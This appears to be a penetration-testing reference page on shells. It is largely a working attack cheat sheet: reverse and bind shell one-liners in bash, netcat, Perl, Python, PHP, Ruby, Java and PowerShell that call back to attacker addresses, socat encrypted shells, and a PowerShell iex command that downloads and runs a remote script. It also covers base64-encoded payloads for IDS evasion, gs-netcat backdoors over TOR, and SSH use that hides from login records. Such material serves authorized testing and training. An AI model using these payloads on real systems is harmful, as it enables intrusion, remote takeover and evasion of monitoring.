Shells
Shell Guides and Resources
Upgrading a shell
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Reverse shell Upgrade to Fully interactive - Linux
Method 1
Simply add 2&>1 to the end of the command
Method 2
(Victim) # python -c "import pty; pty.spawn('/bin/bash')"
(Victim # export TERM=xterm
(Victim) -Now Ctrl + z to background your reverse shell
(Attacker) # stty raw -echo; fg
(Victim) # reset
*If looks wonky
(Attacker) # stty size
(Victim) # stty -rows [#] -columns [#]
Method 3
#sudo apt install rlwrap
# rlwrap nc -lvnp
# stty raw -echo; fg
Method 4
Use Socat
Shells
Shell Collections
Impacket remote execution scripts
psexec.py: PSEXEC like functionality example using RemComSvc
smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.
atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
BlackArch Web Shells - Shell collection included in the BlackArch Linux Distrobution
Python PTY shells - Collection of full PTY shells in python
Operator Handbook: Reverse Shells - pg. 267
Misc Shells and Tools
dbd - dbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features.
sbd - sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.
Reverse Shell and Post Exploitation tool - RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.
Reverse Shell Generator - Cheater tool to generate reverse shell one liners
ShellPop - With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.
SQL webshell - Webshell that can run command line actions on the target as well as interact with an MSSQL database on the target.
Shellerator - Simple CLI tool for the generation of bind and reverse shells in multiple languages
donut - Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters
golang-github-binject-go-donut - This package contains the Donut Injector ported to pure Go.
ibombshell - This package contains a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation).
Weevly webshell - Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.
PyShell - Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating system of the server.
SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications
SSH
Basic Use: #ssh [user]@[host]
Use a specific key and port: #ssh -i ~/.ssh/id_rsa -p [port] [user]@[host]
SOCKS proxy: ssh -D8080 [user]@[host]
Execute a one line command : ssh -i ~/.ssh/id_rsa [user]@[host] “command string”
Local Port Forward: ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
Remote Port Forward:ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
SSH tunnel through T1 to T2:ssh [user]@[T1 IP] -L [Local LPORT]:[T2 IP]:[T2 LPORT] -R [Local LPORT 2]:[Local IP]:[T1 LPORT]
Almost invisible SSH
ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i"
This will not add your user to the /var/log/utmp file and you won't show up in w or who command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts.
SSH tunnel OUT
We use this all the time to circumvent local firewalls and IP filtering:
ssh -g -L31337:1.2.3.4:80 user@server.org
You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'server.org'. An alternative and without the need for a server is to use gs-netcat.
SSH tunnel IN
We use this to give access to a friend to an internal machine that is not on the public Internet:
ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org
Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use gs-netcat.
SSH socks4/5 OUT
OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.
ssh -D 1080 user@server.org
Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through server.org and will appear with the source IP of server.org. An alternative and without the need for a server is to use gs-netcat.
SSH socks4/5 IN
This is the reverse of the above example. It give others access to your local network or let others use your computer as a tunnel end-point.
ssh -g -R 1080 user@server.org
The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use gs-netcat.
Netcat - The original shell tool.
Set Listener
# nc -nlvp [port]
Connect to port
# nc -nv [ip] [port]
Push a file over netcat
#nc -nv [ip] [port] < /full/path/to/file.exe
Catch a pushed file and write it to new file
#nc -nvlp [port] > incoming.exe
Launch command upon connection
#nc -nlvp [port] -e cmd.exe
*UPGRADE Non interactive shell**
Check python version in /usr/bin
# python2.6 -c "import pty; pty.spawn('/bin/bash')"
Reverse shell
TARGET # nc [ip] [port] -e /bin/bash
ATTACKER # nc -n -vv -l -p [port]
Netcat with GAPING _SECURITY_HOLE_disabled
When you dont have access to the -e option (execute command after connect), backpipe commands from file system from netcat back into bin/bash
TARGET # mknod backpipe p && nc [ip] [port] 0<backpipe | /bin/bash 1>backpipe
ATTACKER # nc -n -vv -l -p [port]
Netcat without netcat (/dev/tcp)
TARGET # /bin/bash -i > /dev/tcp/[IP]/[port] 0<&1 2>&1
ATTACKER # nc -n -vv -l -p [port] • netcat without netcat or /dev/tcp
TARGET # mknod backpipe p && telnet [ip] [port] 0<backpipe | /bin/bash 1>backpipe
ATTACKER # nc -n -vv -l -p [port]
Linux listener bind shell, executes bin bash on connection
#mkfifo /tmp/f; nc -lvnp < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
Operator Handbook: Netcat - pg. 209
Socat - The upgraded and encryptable Netcat
Socat - The upgraded and encryptable Netcat
https://github.com/3ndG4me/socat - Socat standalone binary collection
Socat - establishes two bidirectional btye streams and transfers data between them
Bind shell - Linux connect to IP and Port
# socat TCP:[ip]:[port] EXEC: “bash -li”,pty,stderr,sigint,setsid,sane
Bind shell - Windows connect to IP and Port
# socat TCP:[ip]:[port] EXEC:powershell.exe,pipes
Sets listener on port
# socat TCP-L:[port]
Sets listener with stable shell
# socat TCP-L:[port] FILE:
tty
,raw,echo=0
Shares file on port
# socat TCP-L:[port],fork file:[file name]
Encrypted shell
Uses open ssl to create a self signed cert and encrypt
# openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# cat shell.key shell.crt > shell.pem
Reverse shell
#sudo socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0,FILE:
tty
,raw,echo=0
Reverse listener
#sudo socat OPENSSL:[ip]:[port], verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Bind shell
#socat OPENSSL-LISTEN:,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes - Target
#socat OPENSSL::,verify=0 - -Attacker
Powercat - Netcat: The powershell version.
Powercat - Netcat: The powershell version. (Powershell Version 2 and Later Supported)
Powershell enableing
When presented with a User Account Control prompt, select Yes and enter Set-ExecutionPolicy Unrestricted:
Script we can download to a windows host to leverage Powershell and simplify shells
Install on linux
#apt install powercat
places in /usr/share/windows-resources/powercat
Set up
With the script on the target host, we start by using a PowerShell feature known as Dot-sourcing to load the powercat.ps1 script. This will make all variables and functions declared in the script available in the current PowerShell scope. In this way, we can use the powercat function directly in PowerShell instead of executing the script each time.
>. .\powercat.ps1
If the target machine is connected to the internet we can do the same with a remote script by once again using the handy iex cmdlet
> iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
Powercat file transfers
Set up a listener on Attackers Kali instance
# sudo nc -lnvp 443 > receiving_powercat.ps1
Invoke power cat on sending windows machine
> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
-c specifies client mode and sets listening address
-p is the destination port
-i indicates the local file that will be transferred remotely
Reverse shells
> powercat -c [dest ip] -p [dest port] -e cmd.exe
Bind shells - listener
> powercat -l -p [listener port] -e cmd.exe
Stand Alone Payloads
Saving the powercat functionality and given commands as a script
> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
> ./reverseshell.ps1
Warning: these scripts are rather large and have hard coded strings that will set off IDS*
Powershell can execute Base64 encoded commands
We can use the -ge option when redirecting to an output file.
> powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
Due to the way powershell works, you cannot execute the new script as is but you must run its contents
> powershell.exe -E [encoded command string]
This package contains Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE).
Connect like there is no firewall. Securely. The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely. More on https://www.gsocket.io.
gsocket resources
The Global Socket Toolkit comes with a set of tools:
gsocket - Makes an existing program (behind firewall or NAT) accessible from anywhere in the world. It does so by analyzing the program and replacing the IP-Layer with its own Gsocket-Layer. A client connection to a hostname ending in '*.gsocket' then gets automatically redirected (via the GSRN) to this program.
gs-netcat - Netcat on steroids. Turn gs-netcat into an AES-256 encrypted reverse backdoor via TOR (optional) with a true PTY/interactive command shell (
gs-netcat -s MySecret -i
), integrated file-transfer, spawn a Socks4/4a/5 proxy or forward TCP connections or give somebody temporary shell access.gs-sftp - sftp server & client between two firewalled workstations (
gs-sftp -s MySecret
)gs-mount - Access and mount a remote file system (
gs-mount -s MySecret ~/mnt/warez
)blitz - Copy data from workstation to workstation (
blitz -s MySecret /usr/share/*
)...many more examples and tools.
Reverse shell with gs-netcat
Use gs-netcat. It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :>
gs-netcat -s MySecret -l -i # Host
Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed.
To connect to the shell from your workstation:
gs-netcat -s MySecret -i
Use -T to tunnel trough TOR.
Shell One-Liners
Shell One-Liners
Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Netcat with out -e flag
#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
Netcat
#nc -e /bin/sh 10.10.10.10 4443
Netcat windows
#nc -e cmd.exe 10.10.10.10 4443
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
Powershell - reverse shell
>powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Powershell Bind shell
>powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
Last updated